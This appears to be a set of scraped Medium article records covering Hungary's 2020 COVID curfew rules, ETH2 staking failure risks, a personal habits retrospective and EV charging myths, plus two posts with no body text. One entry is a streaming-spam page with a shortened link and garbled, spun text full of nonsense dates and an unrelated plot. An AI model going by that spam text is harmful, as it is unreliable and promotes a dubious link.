https://medium.com/abnormal-security-engineering-blog/combining-ml-models-to-detect-email-attacks-e1b4d1f2d14e
|
['Jeshua Bratman']
|
2020-11-18 00:21:27.244000+00:00
|
['Machine Learning', 'Email Security', 'Artificial Intelligence', 'Cybersecurity', 'Data Science']
|
The second phase of protective measures
|
The Government declares a state of danger in the entire territory of Hungary on the 4th of November 2020. Because of the massive disease outbreak, the Government issued new regulations for the protection of the people’s health and lives. You can find the new life changing measures in the following:
CURFEW
Between 8 p.m. and 5 a.m. you have to be at home or at your current accommodation. If the police or a member of the Hungarian defense forces finds you in the streets during this time interval, the police may impose a fine ranging from HUF 100 000 to HUF 1 000 000. You cannot lodge an appeal against this decision.
There are a few exceptions when you are allowed to leave your residence:
in a situation endangering health or life or threatening serious damage
for performing work
for travelling to your place of work, and for travelling from your place of work to your place of residence
participating in a training or sports competition held for a competitive athlete within the meaning of the Act on sports
In the mentioned cases you have to present a certification that allows you to stay in a public place.
At the link below you can download the required employer’s certification in Hungarian. The document must be undersigned by your employer. If you need any help in this regard, please don’t hesitate to contact us.
The Government also made an exception for dog owners: they can leave their accommodation between 8 p.m. and 5 a.m. to walk their dog. If you don't know the exact permitted distance, at the website below you can search the area where you can walk your dog without getting a fine.
FAMILY GATHERINGS
With the exception of marriage and funerals, family gatherings and private events may be held only if the number of persons present at the same time does not exceed ten. The number of persons present at a funeral shall not exceed fifty.
ACCOMMODATION ESTABLISHMENTS
With the exception of those arriving to engage in business, economic or education activities, staying at an accommodation establishment shall be forbidden.
CATERING FACILITIES
Staying in a catering facility shall be forbidden except for those employed there and those who pick up and deliver food for take-away.
STORES
With the exception of those employed there, staying in a store, in a lottery store, or in a national tobacco shop shall be forbidden between 7 p.m. and 5 a.m. These stores may therefore be open only between 5 a.m. and 7 p.m.
In the above-mentioned places, the operator or manager is obliged to ensure the protective measures. If the police find the operation illegal, they may temporarily close the place for a period less than a day, or even for 1 year. The police can impose this sanction together with a fine.
EDUCATION INSTITUTIONS
Nurseries, kindergartens and primary schools up to the 8th grade are allowed to remain open.
Secondary schools from 9th grade shall operate in digital working arrangements.
In higher education institutions, education takes place in digital form.
|
https://medium.com/enterhungary/the-second-phase-f74b474e604d
|
[]
|
2020-12-15 14:09:22.497000+00:00
|
['Regulation', 'Curfew', 'Hungary', 'Covid 19']
|
¿Quiénes votaron la IVE?
|
|
https://medium.com/factor-data/qui%C3%A9nes-votaron-la-ive-d5814e857b6c
|
['Adriana Chazarreta']
|
2020-12-18 15:28:02.936000+00:00
|
['Logistic Regression', 'Vote', 'Computational Sociology', 'Sociology', 'Argentina']
|
[1x6] Watch Tiny Pretty Things Season 1 Episode 6 Full Episode Online Full HD
|
New Episode — Tiny Pretty Things Season 1 Episode 6 (Full Episode) Top Show
Official Partners Netflix TV Shows & Movies Full Series Online
NEW EPISODE PREPARED ►► https://tinyurl.com/y444jwfa
🌀 All Episodes of “Tiny Pretty Things” 01x06 : Episode 6 Happy Watching 🌀
🦋 TELEVISION 🦋
(TV), in some cases abbreviated to tele or television, is a media transmission medium utilized for sending moving pictures in monochrome (high contrast), or in shading, and in a few measurements and sound. The term can allude to a TV, a TV program, or the vehicle of TV transmission. TV is a mass mode for promoting, amusement, news, and sports.
TV opened up in unrefined exploratory structures in the last part of the 191s, however it would at present be quite a while before the new innovation would be promoted to customers. After World War II, an improved type of highly contrasting TV broadcasting got famous in the United Kingdom and United States, and TVs got ordinary in homes, organizations, and establishments. During the 1950s, TV was the essential mechanism for affecting public opinion.[1] during the 1915s, shading broadcasting was presented in the US and most other created nations. The accessibility of different sorts of documented stockpiling media, for example, Betamax and VHS tapes, high-limit hard plate drives, DVDs, streak drives, top quality Blu-beam Disks, and cloud advanced video recorders has empowered watchers to watch pre-recorded material, for example, motion pictures — at home individually plan. For some reasons, particularly the accommodation of distant recovery, the capacity of TV and video programming currently happens on the cloud, (for example, the video on request administration by Netflix). Toward the finish of the main decade of the 150s, advanced TV transmissions incredibly expanded in ubiquity. Another improvement was the move from standard-definition TV (SDTV) (531i, with 909093 intertwined lines of goal and 434545) to top quality TV (HDTV), which gives a goal that is generously higher. HDTV might be communicated in different arrangements: 3451513, 3451513 and 3334. Since 115, with the creation of brilliant TV, Internet TV has expanded the accessibility of TV projects and films by means of the Internet through real time video administrations, for example, Netflix, HBO Video, iPlayer and Hulu.
In 113, 39% of the world’s family units possessed a TV set.[3] The substitution of early cumbersome, high-voltage cathode beam tube (CRT) screen shows with smaller, vitality effective, level board elective advancements, for example, LCDs (both fluorescent-illuminated and LED), OLED showcases, and plasma shows was an equipment transformation that started with PC screens in the last part of the 1990s. Most TV sets sold during the 150s were level board, primarily LEDs. Significant makers reported the stopping of CRT, DLP, plasma, and even fluorescent-illuminated LCDs by the mid-115s.[3][4] sooner rather than later, LEDs are required to be step by step supplanted by OLEDs.[5] Also, significant makers have declared that they will progressively create shrewd TVs during the 115s.[1][3][8] Smart TVs with incorporated Internet and Web 3.0 capacities turned into the prevailing type of TV by the late 115s.[9]
TV signals were at first circulated distinctly as earthbound TV utilizing powerful radio-recurrence transmitters to communicate the sign to singular TV inputs. Then again TV signals are appropriated by coaxial link or optical fiber, satellite frameworks and, since the 150s by means of the Internet. Until the mid 150s, these were sent as simple signs, yet a progress to advanced TV is relied upon to be finished worldwide by the last part of the 115s. A standard TV is made out of numerous inner electronic circuits, including a tuner for getting and deciphering broadcast signals. A visual showcase gadget which does not have a tuner is accurately called a video screen as opposed to a TV.
🦋 OVERVIEW 🦋
A subgenre that joins the sentiment type with parody, zeroing in on at least two people since they find and endeavor to deal with their sentimental love, attractions to each other. The cliché plot line follows the “kid gets-young lady”, “kid loses-young lady”, “kid gets young lady back once more” grouping. Normally, there are multitudinous variations to this plot (and new curves, for example, switching the sex parts in the story), and far of the by and large happy parody lies in the social cooperations and sexual strain between your characters, who every now and again either won’t concede they are pulled in to each other or must deal with others’ interfering inside their issues.
Regularly carefully thought as an artistic sort or structure, however utilized it is additionally found in the realistic and performing expressions. In parody, human or individual indecencies, indiscretions, misuses, or deficiencies are composed to rebuff by methods for scorn, disparagement, vaudeville, incongruity, or different strategies, preferably with the plan to impact an aftereffect of progress. Parody is by and large intended to be interesting, yet its motivation isn’t generally humor as an assault on something the essayist objects to, utilizing mind. A typical, nearly characterizing highlight of parody is its solid vein of incongruity or mockery, yet spoof, vaudeville, distortion, juxtaposition, correlation, similarity, and risqué statement all regularly show up in ironical discourse and composing. The key point, is that “in parody, incongruity is aggressor.” This “assailant incongruity” (or mockery) frequently claims to favor (or if nothing else acknowledge as common) the very things the humorist really wishes to assault.
In the wake of calling Zed and his Blackblood confidants to spare Tiny Pretty Things, Talon winds up sold out by her own sort and battles to accommodate her human companions and her Blackblood legacy. With the satanic Lu Qiri giving the muscle to uphold Zed’s ground breaking strategy, Tiny Pretty Things’s human occupants are subjugated as excavators looking for a baffling substance to illuminate a dull conundrum. As Talon finds more about her lost family from Yavalla, she should sort out the certainties from the falsehoods, and explain the riddle of her legacy and an overlooked force, before the world becomes subjugated to another force that could devour each living being.
Claw is the solitary overcomer of a race called Blackbloods. A long time after her whole town is annihilated by a pack of merciless hired soldiers, Talon goes to an untamed post on the edge of the enlightened world, as she tracks the huggers of her family. On her excursion to this station, Talon finds she has a strange heavenly force that she should figure out how to control so as to spare herself, and guard the world against an over the top strict tyrant.
|
https://medium.com/@tiny-pretty-things-s1-all/s1-ep6-tiny-pretty-things-series-1-episode-6-hd-720p-online-3bfc4165e02e
|
['Tiny Pretty Things All']
|
2020-12-14 06:13:24.529000+00:00
|
['TV Series', 'Drama', 'Mystery', 'Startup', 'Thriller']
|
There has been a lot of talk lately about making your ETH2 staking setups failure ‘proof’.
|
There has been a lot of talk lately about making your ETH2 staking setups failure ‘proof’. But what are the failure cases in ETH2 to worry about? And how can I figure out which are reasonable or worthwhile to have mitigation solutions in place?
A good starter
As a good starter I recommend reading this great article recently published by Carl Beekhuize from the EF. In the following post I'd like to add some color to Carl's points here and there.
The key takeaway from Carl's blog post is that ETH2 is very forgiving of being offline, particularly if your downtime is uncorrelated with that of other validators. So among the scenarios where you are penalized for not fulfilling your validator duties, you should worry most about the ones that are both likely and correlated, where your validators are offline at the same time as others. These include, among others (in increasing severity):
Infura going down
Cloud service provider failure
Staking service failure
Client failure
How to best mitigate correlated failures like these above?
Resilience. Practically, that means: consider running your own ETH1 endpoint, and preferably a non-Geth one, as Geth is the majority client with roughly 80% market share. Secondly, if you can't or don't want to run your staking machine at home, use a smaller and/or local hosting provider. Furthermore, be aware that staking services run a lot of validators, so a failure of a large staking service can automatically lead to correlated failures; if you can, I encourage you to operate your own ETH2 validators. And lastly, similar to your ETH1 endpoint, consider running a non-majority implementation for your beacon node and validator client, as a bug in the client can affect many validators at the same time. For the time being, this most likely means running a non-Prysm implementation.
But what about the most likely failures like internet or power outages?
As we have seen ETH2 is very forgiving when it comes to being offline. So whether it is worthwhile to mitigate failures like internet or power outages depends on two factors:
On your local situation
The number of validators
How often and how long are the outages you have experienced in the past? Do you foresee more outages in the future? The number of validators is important to consider because your failure cost increases (at least) linearly with the number of validators you are running. Let’s do the math:
An easy way to calculate whether a mitigation solution is suitable for you is to consider your downtime over the past year. Let's call it t_down. Now calculate the rewards rewardsAvg(2*t_down) that you should expect, on average over the next year, for the time 2*t_down across all your validators (take 9% APR for a rough calculation). Not only do you miss rewards while offline, you are also penalized by roughly the same amount; therefore rewardsAvg(2*t_down) is your opportunity cost. All you need to do now is compare the opportunity cost for the specific failure case with the cost of the mitigation solution.
In case of a power outage, a simple mitigation solution is using a UPS. UPS stands for uninterruptible power supply and is basically a battery that is put in between the power grid and your staking machine. It acts like a buffer. If there is a power outage, your staking machine will get power from the UPS, and if the power doesn't return in time it shuts down your staking machine gracefully. Besides reducing the downtime, it also reduces the risk that the validator DB gets corrupted during an outage. UPSes with high battery capacity cost about $100 and consume some additional power, around 10W. So the cost for a UPS is ~$100 + ~87kWh/year.
In case of an internet connection failure, a simple mitigation solution is using a dual-WAN router with a 4G/5G modem. You can set your regular (fiber) internet connection as the default, and the device automatically switches over to the cellular connection once the default one drops out. You can get your hands on such a device for about $70, and it consumes about 10W additionally. For the cellular connection you also need a data plan. Costs for the data plan depend on where you are located and the amount of data you expect to need. So the cost for a backup internet connection is ~$100 + ~87kWh/year + the cost of the data plan.
If your opportunity cost for being offline exceeds the cost for your mitigation solution, the mitigation solution might be worthwhile for you and you should ask yourself whether it is also worth your time setting it up.
For example, if your internet connection has an uptime of 99%, so about 1% downtime, then the opportunity cost, given an average APR of 9% and an Ether price of $553, would be $31.85 per validator. For such an internet connection it wouldn't make sense to have a backup connection for a single validator. But if you are running 20 validators, suddenly your total opportunity cost would be $637. Then the backup internet setup certainly becomes worthwhile to consider.
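This back-of-the-envelope math can be reproduced in a few lines, under the same assumptions as above (32 ETH stake, 9% APR, ETH at $553, and an offline penalty equal to the missed rewards):

```python
# Opportunity cost of validator downtime: missed rewards plus an equal
# inactivity penalty, hence the factor of 2.
def downtime_cost_usd(downtime_fraction: float,
                      apr: float = 0.09,
                      stake_eth: float = 32.0,
                      eth_price_usd: float = 553.0,
                      validators: int = 1) -> float:
    annual_rewards_eth = stake_eth * apr
    cost_eth = 2 * downtime_fraction * annual_rewards_eth
    return cost_eth * eth_price_usd * validators

print(f"1 validator, 1% downtime:   ${downtime_cost_usd(0.01):.2f}")
print(f"20 validators, 1% downtime: ${downtime_cost_usd(0.01, validators=20):.2f}")
```

Plugging in 1% downtime reproduces the $31.85 per validator (and ~$637 for 20 validators) quoted above.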
Are these the worst case scenarios?
No. So far we have mostly talked about scenarios where you are penalized for not fulfilling your validator duties, e.g. because your validators are offline. But there are also scenarios where your staked funds are at risk. I consider these failure cases even worse (in increasing severity):
Getting slashed
Losing access to the mnemonic
A 3rd party getting access to the mnemonic
Now, the most likely way you will get slashed is by trying to build advanced validator (failover) setups that should provide redundancy or by building custom slashing protection systems. At first this sounds counter-intuitive, but you are more likely to shoot yourself in the foot with custom failover systems or custom slashing protections as we have seen in the recent slashings on ETH2:
Staking service provider Stkr by Ankr got 10 validators slashed by running a faulty slashing protection
So don't try to be smart (: and rather be offline for a few days than have a faulty custom solution that slashes you instead of protecting you. As we have seen, ETH2 is very forgiving of being offline.
Also: Don’t run your validator keys in multiple places!
Running your validators in multiple places is a bad idea as experienced by the first validator that got slashed on ETH2
The mnemonic, also known as the seed phrase, is the very secret that you get when generating your keys. The mnemonic is the only way to withdraw your funds later. It is also the only way to re-generate your validator signing keys if you lose them. So you really need to make sure that your mnemonic is stored in a safe place: a place that is secured against third-party access (in particular, do not store the mnemonic on an internet-connected device) and against environmental damage like fire, flood, etc.
Also, check out my article ‘The top ten mistakes you can make’ when ETH2 staking.
As always feel free to reach out to me on Twitter @phil_eth or on the Ethstaker discord @phil.eth. Ethstaker is the warm and welcoming home for all Ethereum stakers and future stakers. If you haven’t joined so far come by and say hello ❤
|
https://medium.com/ethereum-staking/there-has-been-a-lot-of-talk-lately-about-making-your-eth2-staking-setups-failure-proof-b2979b921fb0
|
[]
|
2020-12-11 00:46:35.927000+00:00
|
['Blockchain', 'Failure', 'Solutions', 'Staking', 'Ethereum']
|
Um so I had an amazing year
|
You cannot get poor enough to help poor people thrive or sick enough to help sick people get well. You only ever uplift from your position of strength and clarity and alignment. — Abraham/Esther Hicks
So.
I had an amazing year.
And I’m embarrassed to say it because I’m not dumb. (At least I hope I’m not.) I look around and can see suffering. Upheaval. Sickness. Poverty. I’m not denying those things exist or minimizing anyone else’s experience.
But I wanted to share why I had an amazing year with the intent of uplifting someone else.
Maybe you.
I’m ending the year feeling happier, healthier, richer, more creatively fulfilled, and closer to my family than I have in a very, very long time. I credit this to a few small but key things — and overall, to one book.
Last year about this time I listened to Atomic Habits by James Clear. I’ve lost track of how many copies I’ve bought of this book. Maybe four? At least two hardback copies, because I gave one away. Simply stated, the audio changed my life.
Just — if you’re sick of listening to yourself complain about your bank account or weight or whatever, and you’re serious about changing things, go read/listen to this book.
AND THEN ACTUALLY DO WHAT HE SAYS. The little, dumb, tiny changes. Because they add up.
Last year I got sick of complaining about the same things year after year. And since I mostly complain in my journal or in my own head, it was a very boring place to be. I got sick of wondering why the balance in my bank account didn’t change, why I wasn’t losing weight, and why I wanted to write so much and wasn’t getting anywhere, even though I tried.
But these things (richer, slimmer, more creative) were also what I really desired, deep down inside. I wanted to feel more financially stable, healthier (defined by weight loss), and to write more. (Well, I already wrote plenty. I wanted to write stuff and put it in public where people could actually read it.) These dreams felt very special and secret, but I think they’re somewhat universal — at least for authors.
(Please note: I know that mental health can get in the way of taking any action at all. I’ve written about my depression and anxiety before. If this blog entry makes you feel overwhelmed, please know I’ve been where you are. Focus on taking care of yourself in whatever way you can and don’t worry about all this aspirational ambitious stuff I’m writing. Because the aspirational and ambitious can simply be getting out of bed and taking a shower. I’m proud of you for hanging in there.)
After listening to Atomic Habits, I decided to do the following macro habits all throughout 2020 — and I checked these off on a little grid in the James Clear journal:
1. Take my vitamins.
2. Save $5 every day.
3. Write 10,000 words per week.
4. Post a blog entry every Wednesday and Saturday.
5. Go to the gym 3–5 times a week.
I thought that these were things that could get me to my goals — richer, slimmer, more creatively fulfilled. And overall — happy.
I also had some habits I already did. These were:
1. Meditate for 10 minutes every day. (I usually use a guided YouTube video).
2. Write three pages longhand as Morning Pages (per Julia Cameron). (Incidentally, I’ve done this for decades and credit it to the reason I don’t get writer’s block.)
3. Take a Swedish lesson on Duolingo.
I just wanted to keep these up.
I have lots more habits … like brushing my teeth or whatever (and I actually floss because I bought the stuff and leave it out where I can see it), but the ones above are my more unusual habits.
Well, what happened?
1. I took my vitamins. Boring, but I’m also quite healthy, so maybe it helps my overall wellbeing. I haven’t been sick all year. I keep them by my bed where I see them and remember to take them.
(Yes, I wash my hands all the time and don’t touch my face. And yes, I stayed home in quarantine. Yes, I wore a mask when I went out. But I think taking vitamins helped.)
2. I ended up saving $5 every workday, not every day. I either transferred the money to a Capital One 360 account (because it’s hard to transfer it back) or put $5 into a Stash account. I sometimes would skip Starbucks or something similar and feel virtuous about transferring the $5. Other times I just transferred it.
At the beginning of the year, the Capital One 360 account had $5. It now has $806.
At the beginning of the year the Stash account had $50. It now has almost $2500. (Buying $5 here and there in March when the stock market was down ended up making about $500 over the year, a 23% increase.)
Um, so that’s like $3200 I just kinda now have. Incidentally, $5 per day is $1825 over the course of the year, and I’ve almost doubled that because I invested it, not just saved it — and also sometimes I’d transfer like $10 or $25 if I was feeling wild. Over the months, I saw how the account balance would get close to an even number (like $500), so I’d transfer enough to make it that amount. And it just kept going.
(Also, I’m not intending on this to be money advice. Go talk to someone who actually knows. My thought process was to hedge my bets with doing both safe and speculative — a savings account that earned interest and then various stocks. I also wasn’t spending money I needed for food, shelter, etc. I barely felt the expense, but I very much feel the accumulation of savings.)
There really is magic in just starting to do something small, because it really does compound and snowball into good things.
Maybe in the grand scheme of things $3200 isn’t that much. To me it feels like I have this cute little cushion I literally created out of loose change in a year.
Honestly, it feels like a lot, not “cute” or “little.” If I don’t compare myself to millionaires, it’s kind of amazing.
What would happen if you transferred $1 or $2 a day? By the end of 2021, see how much you have…
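As a rough illustration (ignoring interest and investment gains, which the author notes nearly doubled her own result), a tiny script shows how small daily transfers add up:

```python
# Back-of-the-envelope totals for small daily transfers.
# Ignores interest/investment gains, which can roughly double the result.
def yearly_total(daily_amount, days=365):
    """Total saved after `days` of transferring `daily_amount` each day."""
    return daily_amount * days

for amount in (1, 2, 5):
    print(f"${amount}/day -> ${yearly_total(amount)} after one year")
```

At $5 a day that is the $1,825 figure mentioned above; even $1 or $2 a day leaves you with $365 or $730 you would not otherwise have.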
Another money habit: I wanted to stop buying so much online and one-clicking so many ebooks — even free ones — because it was just too much. I had like 800 unread books. So I kept track of the days I didn’t buy anything or download any books. My ecommerce moratorium ended up being streaks of time I didn’t buy anything and then a day where I would buy everything off of Amazon or whatever all at once. Not sure it did much except make me feel marginally better. With ebooks, while my TBR count is less than what it was at the beginning of the year, it isn’t the zero I’d hoped it to be. But I seriously read about 300–400 books — about 1–2 a day. (I read fast and don’t sleep.) My “read” pile jumped from 800 to 1100. Not sure what to make of it except I read so much and it was really fun. So, I still have about 680 books on my TBR pile for next year. That can be another habit to work on.
3. I’ve written more than 530,000 words this year. The habit I tied it to incidentally, was opening my laptop. If I open my laptop — and that’s a habit I record with a tick mark on a grid — it’s a lot easier to get into the document and start writing. So the way I trick myself to write is I tell myself all I have to do is open my laptop. Simple. I check off the box that I did it and I feel virtuous. To reward myself for actually getting the word count, I have a little jar with binder clips in it and every 1,000 words I put a binder clip in a small old milk bottle. Then I can see the words add up.
I also did a spreadsheet to know what I’ve written this year. I’ve never done one before because it felt too quantitative rather than qualitative. Writing is supposed to be this outlet for me, not something to beat to death with statistics. But I’m glad I did it because writing can be so amorphous. Putting parameters on it made it feel real.
Oh, and I’ve finished one book, set to be published in February. I have a contract for another, and it’s (today) at 77,000 words. Three more books are 50% or more done. And I did NaNoWriMo. So, yeah. It was a productive year.
I also learned that I like juggling projects. Focusing on one can make me stagnant. If I get stuck on one, moving to another really seemed to keep my momentum going.
But I’m now focusing on getting them done and shipped. One at a time. Because they’re all just so close I can feel it.
4. Before this year, I’d published eleven blog entries from 2017 to 2019. This year, I’ve posted 97, not counting this one. I missed a time or two at the beginning, but um, yeah… That’s a big difference.
The reasons I wanted to focus on posting blog entries were multifold. I’d felt “out of it” as far as publishing, having worked on one book for so long that wasn’t gelling. I’d felt frustrated and jealous of those who got their work done. I needed the instant gratification — so to speak — of putting something out there while I worked on projects that took longer. I also wanted to inure myself to the fear of putting myself out there. With each entry — still — I feel fear, but I wanted to do it anyway. So that when the time comes to publish more fiction, I can go, “yeah, I’ve hit publish (literally) 100 times, what’s the big deal?”
My guiding point for writing a blog post has been my gut feeling — tempered by wanting to reach out and help someone else. But to keep up a streak, there is a document on my computer called “Default blog post.” This is what it says in its entirety:
Default blog post
I told myself I just needed to post a blog every Wednesday and Saturday.
Here is me keeping that promise.
If you see that, well, you’ll know how the week is going.
Is there an endgame here? What am I going to do with these blog posts? I can see me taking some ideas and expanding on them and creating some sort of nonfiction/self-help kind of book. I’ve always wanted to do that. I do see them as steppingstones to something bigger.
It also lets me be okay with imperfection. Typos. “Think-Os.” Whatever. This is me with no editor.
5. So, the gym. Well, until it closed, I was going. My trigger was that I just had to check in. That was how I checked the box. Like opening the laptop, actually getting to the gym is the hard part. Once I was there, it was easy.
But the gym closed and is still closed. Like all of us, I needed a Plan B. (C? D?)
I’ve done short walks and long. Currently, I’m just working on doing pushups. I can do a lot of pushups with my knees on the ground. But I can only do a few “real” ones, so that’s what I’m keeping track of. I’m focusing on doing them slowly and properly, not faking my way through them. Faking them is easy, but I’d rather be able to do them right and have the actual arm strength. My trigger for when I do them is when I close my journal, I have to get down and do pushups. (Currently it’s seven.) To someone else that goal might be ridiculously easy. To me, it’s rather difficult and a little embarrassing to post, but whatever. I’m being honest.
I’m ending the year a few pounds lighter than last year — and lighter than I’ve been in years — so I’m calling it a win.
With the other habits, meditating keeps me happy as does dumping my brain in the morning pages. Oh, and I’m on day 622 in a row of Swedish on Duolingo. It feels like I’ve taken about a semester of college Swedish. Not enough to actually converse with someone but getting the hang of it. I’m motivated by a desire to go to Sweden and see some ancestral places — and actually understand some of the language, even though I know most Swedes speak better English than me.
With COVID-19, like most of us, I’ve spent more time at home, but I’m temperamentally suited to that. I know it’s hurt extroverts hard, but as far as I’m concerned, I got to see my family more — even when I went to the office for work.
What am I looking forward to next year? I like the habits I started for 2020. I just want to keep these systems up, because they seem to be working for me. I hope that by using these systems I end up with four to five books happily published in 2021 and I look forward to seeing how the exercise and money habits work out as well.
This entry is about two or three times my usual blog entry, so if you made it this far, thank you. I hope it inspires you to take a small action and then keep taking that small action over and over again. They really do add up.
I wish you the most amazing year ever in 2021. Know that it’s possible.
|
https://medium.com/@lesliemcadamauthor/um-so-i-had-an-amazing-year-c637d79ca83f
|
['Leslie Mcadam']
|
2020-12-26 19:24:32.414000+00:00
|
['Atomic Habit', 'Money Management', 'Weight Loss', 'New Year Resolution', 'Self Improvement']
|
EV Charging Availability: Myths Busted
|
Where or how to charge up your EV is no longer a problem.
Are you one of the 40 million Americans thinking about switching to an electric vehicle (EV) for your next car? Maybe you still have some questions or doubts.
For instance, EV naysayers are quick to claim that charging is a huge problem. They tell you to figure in hours of wait time every time you need a charge — if you can find a port with the plug that fits your particular car and if no one’s in front of you already waiting.
The good news is that recent improvements in EV charging station availability and technology make it super easy to charge and go — almost as fast as you can say EV.
Here you’ll learn that five common myths about EV charging anxiety are just plain false today. And you’ll find loads of tips to make finding EV charging station availability effortless.
EV Charging at Home
First off, all five of the myths dispelled below can be rendered null and void by considering two simple facts:
1. According to the Office of Energy Efficiency and Renewable Energy at the United States Department of Energy, 80% of all electric car owners charge at home.
2. The U.S. Census Bureau’s latest survey reports that the average home-to-work commute time is 26.6 minutes which, depending on driving speed, could mean 20–40 miles behind the wheel each way for most Americans.
Because EVs today can travel about 250–300 miles on a single charge (varies depending on car make and model, driving conditions, speed at which you travel, battery age, etc.), most EV owners never worry about having to find a public EV charging station nearby.
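To make that arithmetic concrete, here is a quick sketch using a conservative 250-mile range and the worst-case 40-mile one-way commute from the figures above (both assumptions for illustration):

```python
# How many full commuting days fit in one charge?
range_miles = 250              # conservative single-charge range
round_trip_miles = 2 * 40      # worst-case daily commute, both ways
days_per_charge = range_miles // round_trip_miles
print(f"About {days_per_charge} full commuting days per charge")
```

Even in the worst case, that is several days of commuting before you need to plug in at home.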
Granted, range anxiety and charge availability may have been an issue when EVs were first invented in 1832. Or even just 10 years ago when EVs regained their popularity due to growing concerns about reducing car emissions in the face of climate change and went about 85 miles on a single charge.
But it’s not true any more.
All you have to do is make sure you “fill up” at home when you need to. If you’re commuting short distances or running errands close by, you could easily go for days or even weeks between charges at home.
It’s actually not that different from checking the gas gauge on a gas-powered car. You’re probably already used to doing that. Only difference is: With an EV, you don’t have to hold your breath over the noxious fumes at the filling station.
With an EV, you can leave home every day on a “full tank” — if you so desire — for peace of mind. No stops at the gas station. Just recharge while you’re sleeping.
Today, many states and local jurisdictions are rewriting their building codes to guarantee that new homes, apartment complexes, and commercial centers come equipped with charging outlets for EVs.
For urban dwellers with on-street parking, charging at retail locations or restaurants while you shop or dine is your best option. In fact, experts predict that much more charging station infrastructure will become available in the near future around shopping and dining hubs.
So it’s no surprise that Tesla recently announced their focus on apartment complexes.
But, what if, despite your best intentions, you’re out and about in need of a charge? No need to panic. Here are the EV charging station availability myths…busted.
Myth #1: There are no or very few places to charge my EV
In the past few years, EV charging station companies have been popping up all over. You can find the latest figures state by state on the website of the U.S. Department of Energy Alternative Fuels Data Center.
According to that source, as of November 30, 2020, there were 28,486 EV charging stations with a total of 94,455 charging ports available all across the nation.
Here’s a breakout from that database of the three station types currently available in the USA (followed by their respective charging rates in parentheses):
Level 1: 1,437 (3–5 miles/hr.)
Level 2: 76,146 (12–75 miles/hr.)
DC Fast Charging (DCFC): 16,824 (100–300 miles/hr.)
Levels 1 and 2 provide electricity in the form of alternating current (AC) that your vehicle converts to the direct current (DC) it needs to operate. DC fast charging supplies extremely high-voltage direct current to your battery. Not all electric vehicles on the market today accept DCFC.
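Using the midpoints of the charging rates quoted above (an assumption for illustration only; real rates vary by vehicle and station), you can estimate how long each level takes to add a given amount of range:

```python
# Approximate miles of range added per hour at each charger level.
# Midpoints of the rate ranges quoted above (assumed for illustration).
RATE_MILES_PER_HOUR = {"Level 1": 4, "Level 2": 40, "DC Fast": 200}

def hours_to_add(miles_needed, level):
    """Hours of charging needed to add `miles_needed` miles of range."""
    return miles_needed / RATE_MILES_PER_HOUR[level]

for level in RATE_MILES_PER_HOUR:
    print(f"{level}: {hours_to_add(100, level):.1f} h to add 100 miles")
```

The spread is dramatic: adding 100 miles of range takes roughly a day on Level 1 but about half an hour on DC fast charging.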
If you’re planning a long trip where you will need to recharge along the way, there are currently several EV charging station companies with nationwide locations. Here are a few of the major ones:
● ChargePoint
● EVgo
● EV Connect
● Blink Charging
● Electrify America
Right now, Tesla restricts access to its vast network of charging stations to Tesla car owners only. (Although this may be changing — at least in some countries.)
Individuals driving all other EV makes and models should consult at least a couple of companies about charging availability, costs, and fees along their proposed route. Then compare (perhaps in a quick spreadsheet you put together) and save.
Myth #2: Charging stations are too far apart
Between the growing number of electric car charging station companies and their ever-expanding networks all over the country, it’s almost a sure bet that you’d be able to find a charge if you needed one.
It may take some planning your route in advance. You’d be smart to purchase a charging subscription or two before you hit the road — or at least register with a couple companies. Some accept credit cards but others may require their own card. Check before you go!
Better safe than sorry.
But, these are really just logistical details that you can deal with. When worked out early, your trip should go smoothly.
But…what if it doesn’t?
Say you’re on a cross-country road trip in your new electric car, lost in the middle of nowhere. You have a charged smartphone but you’re out of range. And you have only 100 miles of charge remaining in your car’s battery. What do you do?
No doubt this is any driver’s nightmare — even if you had a gas-powered car.
Hopefully, before you packed, you’d make sure you had the Level 1 charger that came with your EV when you bought it. You can use it to recharge in an emergency using any standard 120-volt electrical outlet — like at a motel or a small town corner store that you recall passing 50 miles ago before you got lost.
Of course, recharging completely on Level 1 will take a long time, so definitely try to avoid this situation!
Alternatively, you’d have to wait for someone to drive by and hope they’d stop to assist — or at least direct you to somewhere nearby with cell phone reception.
Then when you get internet access, try these suggestions (in no particular order):
● Get on the apps from the companies listed above to find out if there’s an EV charging station close enough to get to. (Hopefully, you installed the apps and registered before you left home.)
● Call customer service at those charging station providers to see if there’s a port suitable for you close to where you’re located, and if it’s currently unoccupied. (You may be able to find all this out from the app without placing a call.)
● Put out a call to help on social media — EV drivers are among the most helpful people on the road!
● Contact local automotive stores or EV car dealerships to see if they sell the Level 1 charger you can use from any electrical outlet.
Unfortunately if you’re stuck, purchasing a Level 2 charger — like the one you use at home — while you’re on the road won’t help. You need an electrician to install it, and they won’t do it without the permission of the owner of the building where you want to use the electrical outlet (like a motel or convenience store).
Tip: Some auto clubs and car insurance companies offer an EV recharge service in their plans. It works much like their flat tire roadside assistance. If you intend to make many long-distance trips with your electric vehicle, it’s worth it.
Myth #3: I never know if a charging station will have the plug I need
Anti-EV folks may try to convince you that unless all electric cars come with a universal plug that’s compatible with all charging ports, it’s a problem. And a good enough reason never to buy an EV.
Fortunately, Level 1 and Level 2 plugs for EVs sold in America use the same “electric vehicle conductive charge coupler” named J-1772. (The one and only exception is Tesla, but they sell an adapter for use with the J-1772.)
For DC fast charging, there are two main connector types: CHAdeMO and CCS (Combined Charging System). CHAdeMO is used on many Asian EVs, while U.S.-made and German cars use CCS. Tesla has its own unique DC fast charger plug.
There are a few basic points to keep in mind about plugs and adapters when you’re on the road:
1. Charging stations may have many more CHAdeMO ports compared to CCS ports, so if your car takes CCS, plan ahead for sure.
2. Tesla charging stations are for Tesla cars only.
When in doubt, call or text the charging station company ahead of time to confirm that a port you can use is at a specific location on your route.
Tip: Before hooking up to any charging port, make sure:
● The cable isn’t frayed. (You don’t want to get shocked by accident!)
● There aren’t any cobwebs, cocoons or insects (dead or alive!) inside the plug.
● The inner gaskets and connection points are intact and in good shape.
If you spot any irregularities, be a courteous EV driver and call it in for a repair. The next person to use the station will thank you.
Myth #4: I can’t be sure if the charging station I need will be occupied
There are many apps that will let you know what’s available for charging your EV at any given moment. Do your research before you head out and choose the best one for you.
One of the most popular is Plugshare. From its app, you’ll get real-time information on charging stations owned by different companies. When you become a member, you’ll get alerts when chargers compatible to your vehicle become open. Plus a whole lot more!
Besides charging station apps providing the latest information on availability, Google Maps offers this real-time service as well.
If you’re traveling long distance, be sure to:
1. Install several charging station company apps on your phone — or at least something like Plugshare.
2. Check for port availability ahead of time.
3. If possible, make a reservation for the port you need.
4. Show up on time and hook up.
